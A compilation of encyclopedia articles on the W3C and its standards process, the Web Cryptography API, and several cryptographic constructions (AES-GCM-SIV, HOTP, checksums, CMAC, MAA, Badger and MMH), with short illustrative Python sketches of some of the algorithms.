It was originally intended that CERN host the European branch of W3C; however, CERN wished to focus on particle physics, not information technology. In April 1995, the French Institute for Research in Computer Science and Automation became the European host of W3C, with Keio University Research Institute at SFC becoming the Asian host in September 1996.[8] Starting in 1997, W3C created regional offices around the world. As of September 2009, it had eighteen World Offices covering Australia, the Benelux countries (Belgium, Netherlands and Luxembourg), Brazil, China, Finland, Germany, Austria, Greece, Hong Kong, Hungary, India, Israel, Italy, South Korea, Morocco, South Africa, Spain, Sweden, and, as of 2016, the United Kingdom and Ireland.[9]

In October 2012, W3C convened a community of major web players and publishers to establish a MediaWiki wiki that seeks to document open web standards, called the WebPlatform and WebPlatform Docs. In January 2013, Beihang University became the Chinese host.[10]

In 2022 the W3C WebFonts Working Group won an Emmy Award from the National Academy of Television Arts and Sciences for standardizing font technology for custom downloadable fonts and typography for web and TV devices.[11]

On 1 January 2023, it reformed as a public-interest 501(c)(3) non-profit organization.[12][13] In October 2023, Seth Dobbs was named as the organization's chief executive officer.[4]

W3C develops technical specifications for HTML5, CSS, SVG, WOFF, the Semantic Web stack, XML, and other technologies.[14] Sometimes, when a specification becomes too large, it is split into independent modules that can mature at their own pace. Subsequent editions of a module or specification are known as levels and are denoted by the first integer in the title (e.g. CSS3 = Level 3). Subsequent revisions on each level are denoted by an integer following a decimal point (for example, CSS2.1 = Revision 1). 
The W3C standard formation process is defined within the W3C process document, outlining four maturity levels through which each new standard or recommendation must progress.[15]

After enough content has been gathered from 'editor drafts' and discussion, it may be published as a working draft (WD) for review by the community. A WD document is the first form of a standard that is publicly available. Commentary by virtually anyone is accepted, though no promises are made with regard to action on any particular element commented upon.[15] At this stage, the standard document may have significant differences from its final form. As such, anyone who implements WD standards should be ready to significantly modify their implementations as the standard matures.[15]

A candidate recommendation (CR) is a version of a more mature standard than the WD. At this point, the group responsible for the standard is satisfied that the standard meets its goal. The purpose of the CR is to elicit aid from the development community on how implementable the standard is.[15] The standard document may change further, but significant features are mostly decided at this point. The design of those features can still change due to feedback from implementors.[15]

A proposed recommendation is the version of a standard that has passed the prior two levels. The users of the standard provide input. At this stage, the document is submitted to the W3C Advisory Council for final approval.[15] While this step is important, it rarely causes any significant changes to a standard as it passes to the next phase.[15]

The recommendation is the most mature stage of development. At this point, the standard has undergone extensive review and testing, under both theoretical and practical conditions. The standard is now endorsed by the W3C, indicating its readiness for deployment to the public, and encouraging more widespread support among implementors and authors.[15] Recommendations can sometimes be implemented incorrectly, partially, or not at all, but many standards define two or more levels of conformance that developers must follow if they wish to label their product as W3C-compliant.[15]

A recommendation may be updated or extended by separately published, non-technical errata or editor drafts until sufficient substantial edits accumulate for producing a new edition or level of the recommendation. Additionally, the W3C publishes various kinds of informative notes which are to be used as references.[15]

Unlike the Internet Society and other international standards bodies, the W3C does not have a certification program. The W3C has decided, for now, that it is not suitable to start such a program, owing to the risk of creating more drawbacks for the community than benefits.[15]

In January 2023, after 28 years of being jointly administered by the MIT Computer Science and Artificial Intelligence Laboratory (located in Stata Center) in the United States, the European Research Consortium for Informatics and Mathematics (ERCIM)[16] (in Sophia Antipolis, France), Keio University (in Japan) and Beihang University (in China), the W3C incorporated as a legal entity, becoming a public-interest not-for-profit organization.[17]

The W3C has a staff team of 70–80 worldwide as of 2015.[18] W3C is run by a management team which allocates resources and designs strategy, led by CEO Jeffrey Jaffe[19] (as of March 2010), former CTO of Novell. 
It also includes an advisory board that supports strategy and legal matters and helps resolve conflicts.[20][21] The majority of standardization work is done by external experts in the W3C's various working groups.[22]

The Consortium is governed by its membership. The list of members is available to the public.[2] Members include businesses, nonprofit organizations, universities, governmental entities, and individuals.[23] Membership requirements are transparent except for one requirement: an application for membership must be reviewed and approved by the W3C. Many guidelines and requirements are stated in detail, but there is no final guideline about the process or standards by which membership might be finally approved or denied.[24] The cost of membership is given on a sliding scale, depending on the character of the organization applying and the country in which it is located.[25] Countries are categorized by the World Bank's most recent grouping by gross national income per capita.[26]

In 2012 and 2013, the W3C started considering adding DRM-specific Encrypted Media Extensions (EME) to HTML5, which was criticised as being against the openness, interoperability, and vendor neutrality that distinguished websites built using only W3C standards from those requiring proprietary plug-ins like Flash.[27][28][29][30][31] On 18 September 2017, the W3C published the EME specification as a recommendation, leading to the Electronic Frontier Foundation's resignation from W3C.[32][33] As feared by the opponents of EME, as of 2020, none of the widely used Content Decryption Modules used with EME are available for licensing without a per-browser licensing fee.[34][35]

A number of standards are developed jointly by the W3C and the Internet Engineering Task Force over the Internet protocol suite.
https://en.wikipedia.org/wiki/World_Wide_Web_Consortium
The Web Cryptography API is the World Wide Web Consortium's (W3C) recommendation for a low-level interface that would increase the security of web applications by allowing them to perform cryptographic functions without having to access raw keying material.[1] This agnostic API would perform basic cryptographic operations, such as hashing, signature generation and verification, and encryption as well as decryption, from within a web application.[2]

On 26 January 2017, the W3C released its recommendation for a Web Cryptography API[3] that could perform basic cryptographic operations in web applications. This agnostic API would utilize JavaScript to perform operations that would increase the security of data exchange within web applications. It would provide a low-level interface to create and/or manage public keys and private keys for hashing, digital signature generation and verification, and encryption and decryption for use with web applications.

The Web Cryptography API could be used for a wide range of purposes. Because the API is agnostic in nature, it can be used on any platform. It would provide a common set of interfaces that would permit web applications and progressive web applications to conduct cryptographic functions without the need to access raw keying material. This would be done with the assistance of the SubtleCrypto interface, which defines a group of methods to perform the above cryptographic operations. Additional interfaces within the Web Cryptography API would allow for key generation, key derivation, and key import and export.[1]

The W3C's specification for the Web Cryptography API places its focus on the common functionality and features that currently exist between platform-specific and standardized cryptographic APIs, rather than those that are known to just a few implementations. The group's recommendation for the use of the Web Cryptography API does not dictate that a mandatory set of algorithms must be implemented. This is because of the awareness that cryptographic implementations will vary amongst conforming user agents because of government regulations, local policies, security practices and intellectual property concerns. There are many types of existing web applications that the Web Cryptography API would be well suited for use with.[1]

Today multi-factor authentication is considered one of the most reliable methods for verifying the identity of a user of a web application, such as online banking. Many web applications currently depend on this authentication method to protect both the user and the user agent. With the Web Cryptography API, a web application would have the ability to provide authentication from within itself instead of having to rely on transport-layer authentication with secret keying material to authenticate user access. This process would provide a richer experience for the user. The Web Cryptography API would allow the application to locate suitable client keys that were previously created by the user agent or had been pre-provisioned by the web application. The application would be able to give the user agent the ability to either generate a new key or re-use an existing key in the event the user does not have a key already associated with their account. 
By binding this process to the Transport Layer Security through which the user is authenticating, the multi-factor authentication process can be additionally strengthened by the derivation of a key that is based on the underlying transport.[1][2]

The API can be used to protect sensitive or confidential documents from unauthorized viewing from within a web application, even if they have previously been securely received. The web application would use the Web Cryptography API to encrypt the document with a secret key and then wrap it with public keys that have been associated with users who are authorized to view the document. Upon navigating to the web application, the authorized user would receive the document in encrypted form and would be instructed to use their private key to begin the unwrapping process that would allow them to decrypt and view the document.[2]

Many businesses and individuals rely on cloud storage. For protection, a remote service provider might want its web application to give users the ability to protect their confidential documents before uploading their documents or other data. The Web Cryptography API would allow users to encrypt and sign such data locally, within the browser, before it is uploaded.

The ability to electronically sign documents saves time, enhances the security of important documents and can serve as legal proof of a user's acceptance of a document. Many web applications choose to accept electronic signatures instead of requiring written signatures. With the Web Cryptography API, a user would be prompted to choose a key that could be generated or pre-provisioned specifically for the web application. The key could then be used during the signing operation.

Web applications often cache data locally, which puts the data at risk of compromise if an offline attack were to occur. The Web Cryptography API permits the web application to use a public key deployed from within itself to verify the integrity of the data cache.[2]

The Web Cryptography API can enhance the security of messaging for use in off-the-record (OTR) and other types of message-signing schemes through the use of key agreement. The message sender and intended recipient would negotiate shared encryption and message authentication code (MAC) keys to encrypt and decrypt messages and prevent unauthorized access.[2]

The Web Cryptography API can be used by web applications to interact with message formats and structures that are defined under the JOSE Working Group.[4] An application can read and import JSON Web Key (JWK) keys, validate messages that have been protected through electronic signing or MAC keys, and decrypt JWE messages.

The W3C recommends that vendors avoid using vendor-specific proprietary extensions with specifications for the Web Cryptography API. This is because it could reduce the interoperability of the API and break up the user base, since not all users would be able to access the particular content. It is recommended that when a vendor-specific extension cannot be avoided, the vendor should prefix it with vendor-specific strings to prevent clashes with future generations of the API's specifications.
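The document-protection pattern described above (encrypt once with a symmetric key, then wrap that key for each authorized reader) is independent of the browser API itself. The following Python sketch shows the same idea using the third-party pyca/cryptography package; the package choice, key sizes, and the in-memory "reader" key pair are illustrative assumptions, not part of the W3C specification.

    import os
    from cryptography.hazmat.primitives import hashes
    from cryptography.hazmat.primitives.asymmetric import rsa, padding
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM

    # One symmetric key encrypts the document.
    doc_key = AESGCM.generate_key(bit_length=256)
    nonce = os.urandom(12)
    ciphertext = AESGCM(doc_key).encrypt(nonce, b"confidential document", None)

    # The document key is wrapped with each authorized reader's public key.
    reader = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                        algorithm=hashes.SHA256(), label=None)
    wrapped_key = reader.public_key().encrypt(doc_key, oaep)

    # An authorized reader unwraps the key with their private key, then decrypts.
    recovered_key = reader.decrypt(wrapped_key, oaep)
    plaintext = AESGCM(recovered_key).decrypt(nonce, ciphertext, None)
    assert plaintext == b"confidential document"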
https://en.wikipedia.org/wiki/Web_Cryptography_API
AES-GCM-SIV is a mode of operation for the Advanced Encryption Standard which provides similar (but slightly worse[1]) performance to Galois/Counter Mode, as well as misuse resistance in the event of the reuse of a cryptographic nonce. The construction is defined in RFC 8452.[2]

AES-GCM-SIV is designed to preserve both privacy and integrity even if nonces are repeated. To accomplish this, encryption is a function of a nonce, the plaintext message, and optional additional associated data (AAD). In the event a nonce is misused (i.e., used more than once), nothing is revealed except in the case that the same message is encrypted multiple times with the same nonce. When that happens, an attacker is able to observe repeat encryptions, since encryption is a deterministic function of the nonce and message. However, beyond that, no additional information is revealed to the attacker. For this reason, AES-GCM-SIV is an ideal choice in cases where unique nonces cannot be guaranteed, such as multiple servers or network devices encrypting messages under the same key without coordination.

Like Galois/Counter Mode, AES-GCM-SIV combines the well-known counter mode of encryption with the Galois mode of authentication. The key feature is the use of a synthetic initialization vector (SIV) which is computed with Galois field multiplication using a construction called POLYVAL (a little-endian variant of Galois/Counter Mode's GHASH). POLYVAL is run over the combination of nonce, plaintext, and additional data, so that the IV is different for each combination.

POLYVAL is defined over GF(2^128) by the polynomial x^128 + x^127 + x^126 + x^121 + 1. Note that GHASH is defined over the "reverse" polynomial x^128 + x^7 + x^2 + x + 1. This change provides efficiency benefits on little-endian architectures.[3]

Implementations of AES-GCM-SIV are available in a number of programming languages.
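A short Python sketch of the nonce-misuse behaviour described above, using the AESGCMSIV class that recent versions of the third-party pyca/cryptography package expose (the class name and its availability are assumptions about the installed version): encrypting the same message twice under the same key and nonce yields identical ciphertexts, and that repetition is all an observer learns.

    import os
    from cryptography.hazmat.primitives.ciphers.aead import AESGCMSIV

    key = AESGCMSIV.generate_key(bit_length=256)
    aead = AESGCMSIV(key)
    nonce = os.urandom(12)

    c1 = aead.encrypt(nonce, b"same message", b"aad")
    c2 = aead.encrypt(nonce, b"same message", b"aad")
    c3 = aead.encrypt(nonce, b"other message", b"aad")

    assert c1 == c2        # deterministic: repeats are visible to an observer
    assert c1 != c3        # but different messages remain unrelated
    assert aead.decrypt(nonce, c1, b"aad") == b"same message"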
https://en.wikipedia.org/wiki/AES-GCM-SIV
HMAC-based one-time password (HOTP) is a one-time password (OTP) algorithm based on HMAC. It is a cornerstone of the Initiative for Open Authentication (OATH).

HOTP was published as an informational IETF RFC 4226 in December 2005, documenting the algorithm along with a Java implementation. Since then, the algorithm has been adopted by many companies worldwide (see below). The HOTP algorithm is a freely available open standard.

The HOTP algorithm provides a method of authentication by symmetric generation of human-readable passwords, or values, each used for only one authentication attempt. The one-time property follows directly from the single use of each counter value.

Parties intending to use HOTP must establish some parameters; typically these are specified by the authenticator, and either accepted or not by the authenticated entity: a shared secret key K, a counter C, and a length d for the generated values.

Both parties compute the HOTP value derived from the secret key K and the counter C. Then the authenticator checks its locally generated value against the value supplied by the authenticated entity. The authenticator and the authenticated entity increment the counter C independently. Since the authenticated entity may increment the counter more than the authenticator, RFC 4226 recommends a resynchronization protocol. It proposes that the authenticator repeatedly try verification ahead of its counter through a window of size s. The authenticator's counter continues forward from the value at which verification succeeds, and requires no action by the authenticated entity.

To protect against brute-force attacks targeting the small size of HOTP values, the RFC also recommends implementing persistent throttling of HOTP verification. This can be achieved by either locking out verification after a small number of failed attempts, or by linearly increasing the delay after each failed attempt.

6-digit codes are commonly provided by proprietary hardware tokens from a number of vendors, which informs the default value of d. Truncation extracts 31 bits, or log10(2^31) ≈ 9.3 decimal digits, meaning that d can be at most 10, with the 10th digit adding less variation, taking values of only 0, 1, and 2 (i.e., 0.3 digits).

After verification, the authenticator can authenticate itself simply by generating the next HOTP value and returning it; the authenticated entity can then generate its own HOTP value to verify it. Note that counters are guaranteed to be synchronised at this point in the process.

The HOTP value is the human-readable design output, a d-digit decimal number (without omission of leading 0s):

    HOTP value = HOTP(K, C) mod 10^d.

That is, the value is the d least significant base-10 digits of HOTP. HOTP is a truncation of the HMAC of the counter C (under the key K and hash function H):

    HOTP(K, C) = truncate(HMAC_H(K, C)),

where the counter C must be encoded big-endian. Truncation first takes the 4 least significant bits of the MAC and uses them as a byte offset i:

    i = MAC[(19 × 8 + 4) : (19 × 8 + 7)],

where ":" is used to extract bits from a starting bit number up to and including an ending bit number, with these bit numbers being 0-origin. The use of "19" in the above formula relates to the size of the output from the hash function. With the default of SHA-1, the output is 20 bytes, and so the last byte is byte 19 (0-origin). That index i is used to select 31 bits from MAC, starting at bit i × 8 + 1:

    truncate(MAC) = MAC[(i × 8 + 1) : (i × 8 + 31)].

31 bits are a single bit short of a 4-byte word. Thus the value can be placed inside such a word without using the sign bit (the most significant bit). 
This is done to ensure that modular arithmetic is never performed on negative numbers, as this has many differing definitions and implementations.[1]

Both hardware and software tokens are available from various vendors; for some of them see the references below. Software tokens are available for (nearly) all major mobile/smartphone platforms (J2ME,[2] Android,[3] iPhone,[4] BlackBerry,[5] Maemo,[6] macOS,[7] and Windows Mobile[5]).

Although the early reception from some of the computer press was negative during 2004 and 2005,[8][9][10] after the IETF adopted HOTP as RFC 4226 in December 2005, various vendors started to produce HOTP-compatible tokens and/or whole authentication solutions. According to the article "Road Map: Replacing Passwords with OTP Authentication"[11] on strong authentication, published by Burton Group (a division of Gartner, Inc.) in 2010, "Gartner's expectation is that the hardware OTP form factor will continue to enjoy modest growth while smartphone OTPs will grow and become the default hardware platform over time."
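A compact Python rendering of the computation defined above, using only the standard library. It is a sketch of the algorithm, not a hardened authenticator (throttling and resynchronization are omitted); the RFC 4226 Appendix D test key and its expected first code are included as a sanity check.

    import hashlib
    import hmac

    def hotp(key: bytes, counter: int, d: int = 6) -> str:
        # HMAC-SHA-1 over the 8-byte big-endian counter.
        mac = hmac.new(key, counter.to_bytes(8, "big"), hashlib.sha1).digest()
        i = mac[19] & 0x0F                      # offset: low 4 bits of the last byte
        # 31 bits starting at byte i, with the top (sign) bit masked off.
        code = int.from_bytes(mac[i:i + 4], "big") & 0x7FFFFFFF
        return str(code % 10 ** d).zfill(d)     # d least significant decimal digits

    # RFC 4226 test vector: ASCII key "12345678901234567890", counter 0.
    assert hotp(b"12345678901234567890", 0) == "755224"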
https://en.wikipedia.org/wiki/HMAC-based_one-time_password
A checksum is a small-sized block of data derived from another block of digital data for the purpose of detecting errors that may have been introduced during its transmission or storage. By themselves, checksums are often used to verify data integrity but are not relied upon to verify data authenticity.[1]

The procedure which generates this checksum is called a checksum function or checksum algorithm. Depending on its design goals, a good checksum algorithm usually outputs a significantly different value, even for small changes made to the input.[2] This is especially true of cryptographic hash functions, which may be used to detect many data corruption errors and verify overall data integrity; if the computed checksum for the current data input matches the stored value of a previously computed checksum, there is a very high probability the data has not been accidentally altered or corrupted.

Checksum functions are related to hash functions, fingerprints, randomization functions, and cryptographic hash functions. However, each of those concepts has different applications and therefore different design goals. For instance, a function returning the start of a string can provide a hash appropriate for some applications but will never be a suitable checksum. Checksums are used as cryptographic primitives in larger authentication algorithms. For cryptographic systems with these design goals, see HMAC.

Check digits and parity bits are special cases of checksums, appropriate for small blocks of data (such as Social Security numbers, bank account numbers, computer words, single bytes, etc.). Some error-correcting codes are based on special checksums which not only detect common errors but also allow the original data to be recovered in certain cases.

The simplest checksum algorithm is the so-called longitudinal parity check, which breaks the data into "words" with a fixed number n of bits, and then computes the bitwise exclusive or (XOR) of all those words. The result is appended to the message as an extra word. In simpler terms, for n = 1 this means adding a bit to the end of the data bits to guarantee that there is an even number of '1's. To check the integrity of a message, the receiver computes the bitwise exclusive or of all its words, including the checksum; if the result is not a word consisting of n zeros, the receiver knows a transmission error occurred.[3]

With this checksum, any transmission error which flips a single bit of the message, or an odd number of bits, will be detected as an incorrect checksum. However, an error that affects two bits will not be detected if those bits lie at the same position in two distinct words. Also, swapping of two or more words will not be detected. If the affected bits are independently chosen at random, the probability of a two-bit error being undetected is 1/n.

A variant of the previous algorithm is to add all the "words" as unsigned binary numbers, discarding any overflow bits, and append the two's complement of the total as the checksum. To validate a message, the receiver adds all the words in the same manner, including the checksum; if the result is not a word full of zeros, an error must have occurred. This variant, too, detects any single-bit error; such a modular sum is used in SAE J1708.[4]

The simple checksums described above fail to detect some common errors which affect many bits at once, such as changing the order of data words, or inserting or deleting words with all bits set to zero. 
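A minimal Python sketch of the longitudinal parity check just described, XORing fixed-size words and appending the result (the word size and sample data are arbitrary illustrative choices):

    from functools import reduce

    def xor_checksum(words: list[int]) -> int:
        # Longitudinal parity: bitwise XOR of all n-bit words.
        return reduce(lambda a, b: a ^ b, words, 0)

    message = [0b1011, 0b0110, 0b1100]              # three 4-bit words
    check = xor_checksum(message)                   # appended by the sender
    # Receiver XORs everything, including the checksum; zero means no error seen.
    assert xor_checksum(message + [check]) == 0

    corrupted = [0b1011, 0b0111, 0b1100]            # single flipped bit
    assert xor_checksum(corrupted + [check]) != 0   # detected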
The checksum algorithms most used in practice, such as Fletcher's checksum, Adler-32, and cyclic redundancy checks (CRCs), address these weaknesses by considering not only the value of each word but also its position in the sequence. This feature generally increases the cost of computing the checksum.

The idea of the fuzzy checksum was developed for detection of email spam by building up cooperative databases from multiple ISPs of email suspected to be spam. The content of such spam may often vary in its details, which would render normal checksumming ineffective. By contrast, a "fuzzy checksum" reduces the body text to its characteristic minimum, then generates a checksum in the usual manner. This greatly increases the chances of slightly different spam emails producing the same checksum. The ISP spam detection software, such as SpamAssassin, of co-operating ISPs submits checksums of all emails to a centralised service such as DCC. If the count of a submitted fuzzy checksum exceeds a certain threshold, the database notes that this probably indicates spam. ISP service users similarly generate a fuzzy checksum on each of their emails and request the service for a spam likelihood.[5]

A message that is m bits long can be viewed as a corner of the m-dimensional hypercube. The effect of a checksum algorithm that yields an n-bit checksum is to map each m-bit message to a corner of a larger hypercube, with dimension m + n. The 2^(m+n) corners of this hypercube represent all possible received messages. The valid received messages (those that have the correct checksum) comprise a smaller set, with only 2^m corners.

A single-bit transmission error then corresponds to a displacement from a valid corner (the correct message and checksum) to one of the m adjacent corners. An error which affects k bits moves the message to a corner which is k steps removed from its correct corner. The goal of a good checksum algorithm is to spread the valid corners as far from each other as possible, to increase the likelihood that "typical" transmission errors will end up in an invalid corner.
https://en.wikipedia.org/wiki/Checksum
One-key MAC (OMAC) is a family of message authentication codes constructed from a block cipher, much like the CBC-MAC algorithm. It may be used to provide assurance of the authenticity and, hence, the integrity of data. Two versions are defined: OMAC1 (identical to CMAC) and OMAC2. OMAC is free for all uses: it is not covered by any patents.[4]

The core of the CMAC algorithm is a variation of CBC-MAC that Black and Rogaway proposed and analyzed under the name "XCBC"[5] and submitted to NIST.[6] The XCBC algorithm efficiently addresses the security deficiencies of CBC-MAC, but requires three keys. Iwata and Kurosawa proposed an improvement of XCBC that requires less key material (just one key) and named the resulting algorithm One-Key CBC-MAC (OMAC) in their papers.[1] They later submitted OMAC1 (= CMAC),[2] a refinement of OMAC, and additional security analysis.[7]

To generate an ℓ-bit CMAC tag (t) of a message (m) using a b-bit block cipher (E) and a secret key (k), one first generates two b-bit sub-keys (k1 and k2) using the following algorithm (this is equivalent to multiplication by x and x^2 in a finite field GF(2^b)). Let ≪ denote the standard left-shift operator, ⊕ denote bit-wise exclusive or, and C a constant that depends only on b. Compute k0 = E_k(0); then k1 = k0 ≪ 1 if the most significant bit of k0 is 0, and k1 = (k0 ≪ 1) ⊕ C otherwise; k2 is derived from k1 in the same way. As a small example, suppose b = 4, C = 0011₂, and k0 = E_k(0) = 0101₂. Then k1 = 1010₂ and k2 = 0100 ⊕ 0011 = 0111₂.

The CMAC tag generation process runs the cipher in CBC-MAC fashion over the b-bit blocks of the message, with the final block XORed with k1 if it is a complete block, or padded and XORed with k2 if it is not; the tag t is the first ℓ bits of the last cipher output. The verification process recomputes the tag from the received message in the same way and compares it with the received tag.

CMAC-C1[8] is a variant of CMAC that provides additional commitment and context-discovery security guarantees.
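The subkey derivation can be checked against the article's small example in a few lines of Python; the function below is written generically, and the toy parameters b = 4, C = 0011₂ come from the text (for the real AES-based CMAC, b = 128 and the constant's value is 0x87).

    def cmac_subkey(k: int, b: int, c: int) -> int:
        # Doubling in GF(2^b): shift left; if the bit shifted out was 1, XOR in C.
        msb = k >> (b - 1)
        k = (k << 1) & ((1 << b) - 1)
        return k ^ c if msb else k

    # Toy example from the text: b = 4, C = 0011, k0 = E_k(0) = 0101.
    k0 = 0b0101
    k1 = cmac_subkey(k0, 4, 0b0011)
    k2 = cmac_subkey(k1, 4, 0b0011)
    assert (k1, k2) == (0b1010, 0b0111)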
https://en.wikipedia.org/wiki/CMAC
The Message Authenticator Algorithm (MAA) was one of the first cryptographic functions for computing a message authentication code (MAC). It was designed in 1983 by Donald Davies and David Clayden at the National Physical Laboratory (United Kingdom) in response to a request of the UK Bankers Automated Clearing Services. The MAA was one of the first message authentication code algorithms to gain widespread acceptance.

The original specification[1][2] of the MAA was given in a combination of natural language and tables, complemented by two implementations in the C and BASIC programming languages. The MAA was adopted by ISO in 1987 and became part of international standards ISO 8730[3][4] and ISO 8731-2,[5] intended to secure the authenticity and integrity of banking transactions. Later, cryptanalysis of MAA revealed various weaknesses, including feasible brute-force attacks, the existence of collision clusters, and key-recovery techniques.[6][7][8][9] For this reason, MAA was withdrawn from ISO standards in 2002 but continued to be used as a prominent case study for assessing various formal methods.[10]

In the early 1990s, the NPL developed three formal specifications of the MAA: one in Z,[11] one in LOTOS,[12] and one in VDM.[13][14] The VDM specification became part of the 1992 revision of the International Standard 8731-2, and three implementations were manually derived from that latter specification: C, Miranda, and Modula-2.[15]

Other formal models of the MAA have been developed. In 2017, a complete formal specification of the MAA as a large term rewriting system was published;[16] from this specification, implementations of the MAA in fifteen different languages have been generated automatically. In 2018, two new formal specifications of the MAA, in LOTOS and LNT, were published.[17]
https://en.wikipedia.org/wiki/Message_Authenticator_Algorithm
Badger is a message authentication code (MAC) based on the idea of universal hashing, developed by Boesgaard, Scavenius, Pedersen, Christensen, and Zenner.[1] It is constructed by strengthening the ∆-universal hash family MMH using an ϵ-almost strongly universal (ASU) hash function family after the application of ENH (see below), where the value of ϵ is 1/(2^32 − 5).[2] Since Badger is a MAC function based on the universal hash function approach, the conditions needed for the security of Badger are the same as those for other universal hash functions such as UMAC.

The Badger MAC processes a message of length up to 2^64 − 1 bits and returns an authentication tag of length u · 32 bits, where 1 ≤ u ≤ 5. According to the security needs, the user can choose the value of u, that is, the number of parallel hash trees in Badger. One can choose larger values of u, but those values do not further influence the security of the MAC. The algorithm uses a 128-bit key, and the message length that may be processed under one key is limited to 2^64.[3]

The key setup has to be run only once per key in order to run the Badger algorithm under a given key, since the resulting internal state of the MAC can be saved and used with any other message that will be processed later.

Hash families can be combined in order to obtain new hash families. For the ϵ-AU, ϵ-A∆U, and ϵ-ASU families, the latter are contained in the former. For instance, an A∆U family is also an AU family, an ASU family is also an A∆U family, and so forth. On the other hand, a stronger family can be reduced to a weaker one, as long as a performance gain can be reached. A method to reduce a ∆-universal hash function to a universal hash function is the following.

Theorem 2:[1] Let H^∆ be an ϵ-A∆U hash family from a set A to a set B. Consider a message (m, m_b) ∈ A × B. Then the family H consisting of the functions h(m, m_b) = H^∆(m) + m_b is ϵ-AU. Indeed, if m ≠ m′, then the probability that h(m, m_b) = h(m′, m_b′) is at most ϵ, since H^∆ is an ϵ-A∆U family; if m = m′ but m_b ≠ m_b′, then the probability is trivially 0. The proof of Theorem 2 is given in.[1]

The ENH family is constructed based on the universal hash family NH (which is also used in UMAC):

    NH_K(M) = Σ_{i=1}^{ℓ/2} (m_{2i−1} +_w k_{2i−1}) · (m_{2i} +_w k_{2i}) mod 2^{2w},

where '+_w' means 'addition modulo 2^w' and m_i, k_i ∈ {0, …, 2^w − 1}. It is a 2^{−w}-A∆U hash family.

Lemma 1:[1] The following single-term version of NH is 2^{−w}-A∆U:

    NH_K(M) = (m_1 +_w k_1) · (m_2 +_w k_2) mod 2^{2w}.

Choosing w = 32 and applying Theorem 2 to this version of NH, one obtains the 2^{−32}-AU function family ENH, the basic building block of the Badger MAC: the 64-bit NH output is combined, modulo 2^64, with an extra 64-bit message word, so that all arguments are 32 bits long and the output has 64 bits.

Badger is constructed from these families and can be described as the composition H = F ∘ H*, where an ϵ_{H*}-AU universal function family H* is used to hash messages of any size onto a fixed size, and an ϵ_F-ASU function family F is used to guarantee the strong universality of the overall construction. NH and ENH are used to construct H*. 
The maximum input size of the function family H* is 2^64 − 1 bits and the output size is 128 bits, split into 64 bits each for the message and the hash. The collision probability for the H*-function ranges from 2^{−32} to 2^{−26.14}. To construct the strongly universal function family F, the ∆-universal hash family MMH* is transformed into a strongly universal hash family by adding another key.

Two steps have to be executed for every message: the processing phase and the finalization phase.[3] In the processing phase, the data is hashed to a 64-bit string. A core function h : {0,1}^64 × {0,1}^128 → {0,1}^64 is used in this phase; it hashes a 128-bit string m_2 ∥ m_1 to a 64-bit string h(k, m_2, m_1). For any n, +_n means addition modulo 2^n; given a 2n-bit string x, L(x) means its least significant n bits and U(x) means its most significant n bits. A message is processed with this function, with level_key[j][i] denoted k_j^i in the specification's pseudo-code.

In the finalization phase, the 64-bit string resulting from the processing phase is transformed into the desired MAC tag. The finalization phase uses the Rabbit stream cipher, with both key setup and IV setup, taking the finalization key final_key[j][i] as k_j^i. In the specification's pseudo-code, k denotes the key in the Rabbit Key Setup(K), which initializes Rabbit with the 128-bit key k; M denotes the message to be hashed, and |M| the length of the message in bits; q_i denotes the message M divided into i blocks; and, for a given 2n-bit string x, L(x) and U(x) respectively denote its least significant and most significant n bits.

Boesgaard, Christensen and Zenner report the performance of Badger measured on a 1.0 GHz Pentium III and on a 1.7 GHz Pentium 4 processor.[1] The speed-optimized versions were programmed in assembly language inlined in C and compiled using the Intel C++ 7.1 compiler, and the authors tabulate Badger's properties for various restricted message lengths: memory requirements (the amount of memory needed to store the internal state, including key material and the inner state of the Rabbit stream cipher), key setup, and finalization with IV setup.

The name MMH stands for Multilinear-Modular-Hashing. Applications in multimedia include, for example, verifying the integrity of an on-line multimedia title. The performance of MMH is based on the improved support of integer scalar products in modern microprocessors. MMH uses single-precision scalar products as its most basic operation. It consists of a (modified) inner product between the message and a key modulo a prime p. The construction of MMH works in the finite field F_p for some prime integer p.

MMH* involves a construction of a family of hash functions consisting of multilinear functions on F_p^k for some positive integer k. The family MMH* of functions from F_p^k to F_p is defined by

    g_x(m) = m · x = Σ_{i=1}^{k} m_i x_i mod p,

where x and m are vectors of length k. 
In the case of a MAC, m is a message and x is a key, where m = (m_1, …, m_k) and x = (x_1, …, x_k), with x_i, m_i ∈ F_p. MMH* should satisfy the security requirements of a MAC, enabling, say, Ana and Bob to communicate in an authenticated way. They have a secret key x. Say Charles listens to the conversation between Ana and Bob and wants to change the message into his own message to Bob, which should pass as a message from Ana. So his message m′ and Ana's message m will differ in at least one bit (e.g., m_1 ≠ m′_1). Assume that Charles knows that the function is of the form g_x(m) and that he knows Ana's message m but does not know the key x; then the probability that Charles can change the message, or send his own message, is captured by the following theorem.

Theorem 1:[4] The family MMH* is ∆-universal.

Proof: Take a ∈ F_p, and let m and m′ be two different messages. Assume without loss of generality that m_1 ≠ m′_1. Then for any choice of x_2, x_3, …, x_k, there is exactly one value of x_1 satisfying g_x(m) − g_x(m′) ≡ a (mod p), since m_1 − m′_1 ≠ 0 is invertible modulo p; hence, over a uniformly random x_1, the probability that g_x(m) − g_x(m′) ≡ a (mod p) is 1/p.

To illustrate the theorem, take F_p for p prime and represent the field as F_p = {0, 1, …, p − 1}. If one takes an element in F_p, say 0 ∈ F_p, then the probability that a uniformly random x_1 equals 0 is 1/p. So what one actually needs to compute is Pr[g_x(m) ≡ g_x(m′) (mod p)], which by the argument above (taking a = 0) also equals 1/p.

From the proof above, 1/p is the collision probability of the attacker in one round, so on average p verification queries will suffice to get one message accepted. To reduce the collision probability, it is necessary to choose a large p, or to concatenate n such MACs using n independent keys so that the collision probability becomes 1/p^n. In this case the number of keys is increased by a factor of n and the output is also increased by a factor of n.

Halevi and Krawczyk[4] construct a variant called MMH*_32. The construction works with 32-bit integers and with the prime integer p = 2^32 + 15. Actually the prime p can be chosen to be any prime which satisfies 2^32 < p < 2^32 + 2^16. This idea is adopted from the suggestion by Carter and Wegman to use the primes 2^16 + 1 or 2^31 − 1. MMH*_32 maps ({0,1}^32)^k to {0,1}^32, where {0,1}^32 means {0, 1, …, 2^32 − 1} (i.e., binary representation), with the functions g_x defined as in MMH* over 32-bit words and the prime p above. By Theorem 1, the collision probability is about ϵ = 2^{−32}, and the family MMH*_32 can be regarded as ϵ-almost ∆-universal with ϵ = 2^{−32}.

